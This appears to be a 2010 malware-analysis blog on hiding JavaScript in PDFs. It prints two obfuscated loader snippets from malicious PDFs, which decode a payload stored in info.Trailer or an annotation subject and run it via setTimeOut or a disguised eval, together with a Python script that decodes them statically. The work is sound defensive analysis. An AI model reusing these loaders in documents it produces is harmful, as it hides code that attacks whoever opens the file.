Wednesday, February 17, 2010

More fun with PDF Obfuscation

Another interesting way to hide a block of JavaScript inside a PDF, this time in the document's info.Trailer string:

exmu='dmw';
if(app.alert)exmu='';                        // app.alert exists in Adobe Reader, so exmu becomes '' there
WmMw=this;
zisc=WmMw.info;                              // the document info dictionary
exmu=exmu+unescape('%')+exmu;                // '%' inside Reader, 'dmw%dmw' anywhere app.alert is missing
y1vw=zisc.Trailer.replace(/([A-Z])/g,exmu);  // every upper-case letter in info.Trailer stands in for '%'
app.setTimeOut(unescape(y1vw),3)             // unescape() the result and run it after 3 ms

Monday, February 15, 2010

Shellcode Detection Tool

New web tool - paste your hex straight from a hex editor into the Decoder Tool and select "Detect as shellcode" to run a libemu detection scan. It also decodes various JavaScript obfuscation methods such as fromCharCode, Unicode escaping and regular hex escaping.

Executable extraction from documents

New feature in beta: extraction of EXE files and embedded documents. Check the bottom of the report page for a list of embedded files. The MD5s may differ from those of the actual dropped files, because any trailing whitespace at the end of the EXE isn't included in the extracted copy.

Thursday, February 11, 2010

PDF JavaScript Obfuscation

Here's a quick note on an emerging JavaScript obfuscation technique. It uses getAnnots and syncAnnotScan to iterate through FlateDecode blocks that contain raw encoded data. Inside the encoded data is usually packed, obfuscated JavaScript carrying some recent exploit.

var z; var y;
z = y = app.doc;
y = 0;
z.syncAnnotScan();                                      // make Reader load the annotation objects
y = z;
var p = y.getAnnots({ nPage: 0 });                      // annotations on the first page
var s = p[0].subject;                                   // the encoded payload sits in the first annotation's subject
var l = s.replace(/z/g, 'a%b'.replace(/[ab]/g, ''));    // 'a%b' -> '%', so every 'z' becomes '%'
s = this['unes' + 'cape'](l);                           // unescape() assembled from string pieces
var e = app['ev' + 'al'];                               // eval() likewise
e(s);
s = '';
z = 1;
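Both samples, the info.Trailer one above and this getAnnots/subject one, boil down to the same decoding step: a chosen marker character stands in for '%', and the result is fed to unescape(). The script below is an added example (not code from the original post) that reproduces that step statically in Python, so an analyst can recover the payload from the extracted Trailer or subject string without running it inside Reader; the sample strings are constructed, not taken from real malware.

```python
import re

# Python port of the JavaScript unescape() semantics the samples rely on:
# %uXXXX -> one UTF-16 code unit, %XX -> one byte-valued character; anything
# else (including malformed escapes) is copied through unchanged.
_ESC = re.compile(r'%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})')


def js_unescape(s: str) -> str:
    def repl(m):
        hex4, hex2 = m.group(1), m.group(2)
        return chr(int(hex4 or hex2, 16))
    return _ESC.sub(repl, s)


def decode_marker_payload(encoded: str, marker: str) -> str:
    """Reproduce what both samples do at runtime: every character matching
    the regex `marker` stands in for '%', then the string is unescape()d.
    No Reader object model (app, this.info, getAnnots) is needed."""
    return js_unescape(re.sub(marker, '%', encoded))


def decode_trailer_payload(trailer: str) -> str:
    # info.Trailer variant: replace(/([A-Z])/g, '%')
    return decode_marker_payload(trailer, r'[A-Z]')


def decode_subject_payload(subject: str) -> str:
    # annotation subject variant: replace(/z/g, '%')
    return decode_marker_payload(subject, r'z')


# Constructed sample inputs (hypothetical, not real malware strings). Note that
# the hex digits after each marker must be lowercase in the Trailer variant,
# otherwise the same [A-Z] substitution would clobber them.
SAMPLE_TRAILER = "Q61ppW2ealertK28'hi'Z29"
SAMPLE_SUBJECT = "z61ppz2ez61lertz28z27hiz27z29"

if __name__ == "__main__":
    print(decode_trailer_payload(SAMPLE_TRAILER))   # app.alert('hi')
    print(decode_subject_payload(SAMPLE_SUBJECT))   # app.alert('hi')
```

The same routine works on a string pulled out of a FlateDecode stream by any PDF parser; only the marker regex changes between variants.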